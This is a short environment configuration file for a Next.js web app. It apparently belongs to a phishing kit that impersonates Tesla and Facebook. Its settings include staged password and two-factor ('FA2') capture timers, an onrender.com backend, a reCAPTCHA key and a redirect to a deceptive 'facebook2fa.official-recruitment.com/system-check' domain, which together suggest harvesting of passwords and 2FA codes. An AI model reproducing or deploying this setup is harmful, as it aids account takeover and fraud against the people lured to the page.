PORT=3000
NEXT_PUBLIC_CONTEXT=TESLA
NEXT_PUBLIC_BACKEND_URL=https://teslaback132.onrender.com
NEXT_PUBLIC_FA2_WAIT_FOR_TIMEOUT=true
NEXT_PUBLIC_FA2_TIMEOUT=60
NEXT_PUBLIC_PASSWORD1_DURATION=60
NEXT_PUBLIC_RECAPTCHA_SITE_KEY=6LeWgH0rAAAAAJumgEbiTEvfp_IRmvfjhClsefsA
NEXT_PUBLIC_REDIRECT_URL=https://facebook2fa.official-recruitment.com/system-check
